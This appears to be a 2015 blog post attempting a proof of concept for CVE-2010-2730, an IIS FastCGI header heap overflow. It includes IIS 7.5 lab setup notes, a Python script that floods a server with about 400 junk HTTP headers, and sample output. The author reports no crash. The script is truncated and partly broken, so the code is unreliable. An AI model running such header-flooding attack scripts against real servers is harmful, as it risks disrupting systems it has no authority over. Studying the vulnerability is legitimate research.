Saturday, February 28, 2015

CVE-2010-2730: Microsoft IIS Request Header Buffer Overflow Vulnerability

Writing Proof of Concept based on information available on various sites.
Checkpoint details the Vulnerability as

"The vulnerability is due to a heap buffer overflow error when processing unexpected number of headers in an HTTP request. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to a target server. Successful exploitation would allow an attacker to inject and execute arbitrary code on the target system with the security privileges of the IIS Worker process."

Configuring FastCGI for IIS 7.5
Browse to
    Control Panel -> Programs and Features 
click "Turn Windows features on or off" and follow the path shown below.
Note: I also tried enabling only CGI and un checking all the other checkboxes given below.

Install Administrator pack for IIS 7.5 after installing the pack click on start and type IIS you will see Internet Information Services (IIS Manager), clicking on it will take you to below window.

Configure FastCGI as shown below

If you feel configuration didn'g go fine you can configure and verify the same using CLI.
appcmd.exe is found at

If FastCGI installation is successful accessing
should show below page. I created the page phpinfo.php under
make sure the directory has proper permissions.

Proof of Concept

import os, sys
import urllib2

def main(all_args):
    print "in main"
    if len(all_args) != 3:
        print "invalid args"
        print "usage:\n\t%s server_ip_addr http_port"%(all_args[0])
    headers = {"Host":all_args[1],
                "Accept": "text/html,application/xhtml+xml,application/xml",
                "Accept-Language": "en-us",
                "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
                "Keep-Alive": "115",
                "Connection": "keep-alive"}

    for k,v in headers.items():
        print (k, v)

    #create junk headers
    print "Creating junk Request Headers"
    for i in range(1,400):
        junk_header = "My-Name" + str(i)
        value = "Praveen Darshanam" + str(i)
        headers.update({junk_header: value})

    url = "http://" + all_args[1] + ":" + all_args[2] + "/phpinfo.php"
    #url = "http://" + all_args[1] + "/info.php"
    print "url: " + url
    #data = "From Praveen Darshanam"
    #req = urllib2.Request(url, data, headers)
    req = urllib2.Request(url, None, headers)
    response = urllib2.urlopen(req)
    print "Response Length =" + str(len(

if __name__ == "__main__":
    print "sys.argv=" + str(sys.argv)

./ server_ip_addr http_port
$ ./ 80
sys.argv=['./', '', '80']
in main
('Accept-Language', 'en-us')
('Connection', 'keep-alive')
('Accept', 'text/html,application/xhtml+xml,application/xml')
('Keep-Alive', '115')
('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
('Host', '')
Creating junk Request Headers
Response Length =119639

Exploit Traffic

I didn't see any crash after sending multiple fake headers, not sure if I interpreted the Vulnerability in correct manner.